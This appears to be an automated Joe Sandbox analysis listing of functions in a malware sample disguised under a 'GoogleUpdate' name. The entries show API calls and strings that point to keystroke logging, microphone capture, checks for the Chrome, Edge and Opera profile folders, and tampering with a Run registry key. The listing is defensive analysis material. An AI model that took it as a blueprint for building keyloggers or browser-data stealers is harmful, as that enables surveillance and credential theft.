Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C

Function 00415B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
IsWindowVisible.USER32(?), ref: 00415B37

Strings

(%G, xrefs: 00415BDC

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Window$TextVisible
String ID: (%G
API String ID: 1670992164-3377777310
Opcode ID: fd2ff7ff3275d3c7faaa283d4d65487a7059631aa5508a7a24a326fc3211d187
Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
Opcode Fuzzy Hash: fd2ff7ff3275d3c7faaa283d4d65487a7059631aa5508a7a24a326fc3211d187
Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A

Function 0043A3B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0043A47A

Strings

@F, xrefs: 0043A429
@F, xrefs: 0043A430

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CallFilterFunc@8
String ID: @F$@F
API String ID: 4062629308-3436687868
Opcode ID: 16cbe90923eaebb00dd39f36306d65f0abe7ab86164c1207374e317e2438dedd
Instruction ID: d046661977b9f70fa2c81c6cfd40d9a104c7fef52231e330e595ae3c7a73c1ff
Opcode Fuzzy Hash: 16cbe90923eaebb00dd39f36306d65f0abe7ab86164c1207374e317e2438dedd
Instruction Fuzzy Hash: 2F214C3165020056D7186B799D0636F33915F5D338F28A31FF8A18B3E1E7BC8962860F

Function 0043A7F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0043A8BC

Strings

@F, xrefs: 0043A872
@F, xrefs: 0043A86B

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CallFilterFunc@8
String ID: @F$@F
API String ID: 4062629308-3436687868
Opcode ID: 05b9a46a5ff75a344cafbd81f1c8e321827cbd969dec9deaf21c8b585dac50da
Instruction ID: 70967ea4cb1e6682f5d06301c8bd88165fdf16009f8cb562ef1cc0c82826ef49
Opcode Fuzzy Hash: 05b9a46a5ff75a344cafbd81f1c8e321827cbd969dec9deaf21c8b585dac50da
Instruction Fuzzy Hash: 4C212531A5021086C71CBB799C0236E7391AF4D338F28675FF8A29A2D1E77C8953864F

Function 0043A8F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043A924
_free.LIBCMT ref: 0043A94A

Strings

XF, xrefs: 0043A9B1

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free
String ID: XF
API String ID: 269201875-1082896132
Opcode ID: cb74daebedeac94c0edd9e9a4f608c47af35d50e83ab7986da7a67bf282e73af
Instruction ID: 29f128b94e4315e8473d4fe5e2203e9150e620d95e20f300bbe5d6479d49c613
Opcode Fuzzy Hash: cb74daebedeac94c0edd9e9a4f608c47af35d50e83ab7986da7a67bf282e73af
Instruction Fuzzy Hash: FD11B4B1A402005EE7205F2ABC45B5632946F54734F165A37F9A0EB3E0F3B8C8854B8B

Function 00432D4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
___raise_securityfailure.LIBCMT ref: 00432E76

Strings

(F, xrefs: 00432E71

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (F
API String ID: 3761405300-3109638091
Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F

Function 004194DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

%02i:%02i:%02i:%03i , xrefs: 00419509
| , xrefs: 00419527

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: a67c926593161fd0d94068773a7f546b8f59043c1d86e2b9fa0726e697ac87bd
Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
Opcode Fuzzy Hash: a67c926593161fd0d94068773a7f546b8f59043c1d86e2b9fa0726e697ac87bd
Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A

Function 00412077 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0041209B
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004120D1

Strings

P0F, xrefs: 00412096

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID: P0F
API String ID: 3660427363-3540264436
Opcode ID: c6eb32ecf86134c96b4320637183a1ff6d77c95426d782a482a776d7527dd5bc
Instruction ID: 333f44122c6306c69f78a99928583bd7e211529a197e6eb40258ce4aa2bc4044
Opcode Fuzzy Hash: c6eb32ecf86134c96b4320637183a1ff6d77c95426d782a482a776d7527dd5bc
Instruction Fuzzy Hash: 5101DFB6A0010CBFEB14DB91DC06EFE7BBDEB48210F00017AFA04E2200E6B16F0096B4

Function 0044C257 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

_abort.LIBCMT ref: 0044C289
_free.LIBCMT ref: 0044C2BD

Strings

pF, xrefs: 0044C2B4

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ErrorLast_abort_free
String ID: pF
API String ID: 289325740-2973420481
Opcode ID: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
Instruction ID: 681b650f5022ba5d363f9e5fe3477a26ea07511fc4476d54e9c473318faef7cf
Opcode Fuzzy Hash: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
Instruction Fuzzy Hash: 2701CC75D02A319BE7B19F9A944165AB760BF04710B1D025BF96473381D7FC29418FCD

Function 004017CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(00689C38,00000020,?,?,00473A38,00471E78,?,00000000,004019F5), ref: 00401829
waveInAddBuffer.WINMM(00689C38,00000020,?,00000000,004019F5), ref: 0040183F

Strings

7i, xrefs: 004017D8

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: 7i
API String ID: 2315374483-1667622458
Opcode ID: 27540f122eb6a60785947e09fd395fa0183dfc65a449e97ebebab49f2f555e0b
Instruction ID: 3a660176e7f8b230147204ba984e124cfbcdafa7022ac6de76214ba255081ced
Opcode Fuzzy Hash: 27540f122eb6a60785947e09fd395fa0183dfc65a449e97ebebab49f2f555e0b
Instruction Fuzzy Hash: 2F01AD76300205AFD7009F79EC44A29BBB9FB49314701813AF809C3772EB75AC118B98

Function 0040B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A

Strings

\AppData\Local\Microsoft\Edge\, xrefs: 0040B484
UserProfile, xrefs: 0040B46E

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: 159f7fd17d1b243dae4a7ace972dcd937847c40b65fb35a0abdc828e2a633f8f
Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
Opcode Fuzzy Hash: 159f7fd17d1b243dae4a7ace972dcd937847c40b65fb35a0abdc828e2a633f8f
Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9

Function 0040B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437

Strings

\AppData\Local\Google\Chrome\, xrefs: 0040B421
UserProfile, xrefs: 0040B40B

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: 916fef2f778631c75ec8644c97e7d2ef853b56493246b695851a20b5b250d49e
Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
Opcode Fuzzy Hash: 916fef2f778631c75ec8644c97e7d2ef853b56493246b695851a20b5b250d49e
Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD

Function 0040B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD

Strings

AppData, xrefs: 0040B4D1
\Opera Software\Opera Stable\, xrefs: 0040B4E7

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: 150e870e7e5e4af8175d5cfa7ba5a62712d901fed90a36ab12f25508577606ff
Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
Opcode Fuzzy Hash: 150e870e7e5e4af8175d5cfa7ba5a62712d901fed90a36ab12f25508577606ff
Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD

Function 00440CE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00440D2E

Strings

0Zj, xrefs: 00440CE5, 00440D14

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free
String ID: 0Zj
API String ID: 269201875-907608346
Opcode ID: 236c1eb35750adf7c97d481cc106614635bd8075b301b45bd990d5e3345ade9a
Instruction ID: 2da6b69c26c345968169ae82ae00459ec8aec7f537a5c8756946128e80711ba3
Opcode Fuzzy Hash: 236c1eb35750adf7c97d481cc106614635bd8075b301b45bd990d5e3345ade9a
Instruction Fuzzy Hash: 5EE02B62A0553460F621273F3C49B6B15849BC137AF21033FF664861D1FF7C485A615E

Function 0040A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040A597

Part of subcall function 00409468: GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
Part of subcall function 00409468: ToUnicodeEx.USER32(0000005B,0000005B,?,?,00000010,00000000,00000000), ref: 004094E1

Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A

Strings

[AltL], xrefs: 0040A5D9
[AltR], xrefs: 0040A5CD

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
String ID: [AltL]$[AltR]
API String ID: 3195419117-2658077756
Opcode ID: 95818baf887a83fbd095ba787890aaff40716197e7bc3e10cf8f15d14301b647
Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
Opcode Fuzzy Hash: 95818baf887a83fbd095ba787890aaff40716197e7bc3e10cf8f15d14301b647
Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF

Function 0040A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040A5F1

Strings

[CtrlR], xrefs: 0040A60E
[CtrlL], xrefs: 0040A61F

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 8632b80a32c9fa32f21b550938a6eee15c3a690095e5f6be671f0c8cc692680c
Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
Opcode Fuzzy Hash: 8632b80a32c9fa32f21b550938a6eee15c3a690095e5f6be671f0c8cc692680c
Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF

Function 00412414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BD02,00000000,?,00472200,pth_unenc,0gj), ref: 00412422
RegDeleteValueW.ADVAPI32(?,?,?,00472200,pth_unenc,0gj), ref: 00412436

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412420

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664

Function 004112B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(00000000,0gj,0040E2B2), ref: 004112C5
WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8

Strings

0gj, xrefs: 004112B5

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ObjectProcessSingleTerminateWait
String ID: 0gj
API String ID: 1872346434-1559316900
Opcode ID: 3250c3065a615e5fa00de520b6f6c814d77e8e8054cf58f577d93f1f98329294
Instruction ID: b5655bab4260c8b751e52e8c7bcc6e4b5c94833391ebbdcfa87c891e0d6e2540
Opcode Fuzzy Hash: 3250c3065a615e5fa00de520b6f6c814d77e8e8054cf58f577d93f1f98329294
Instruction Fuzzy Hash: 3ED022301452009FEB001BB0BC08B003B68A708332F204372F9A2822F0D7F6D818AA1A

Function 00433058 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433064

Part of subcall function 00432FCD: std::exception::exception.LIBCONCRT ref: 00432FDA

__CxxThrowException@8.LIBVCRUNTIME ref: 00433072

Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25

Strings

P@, xrefs: 00433058

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

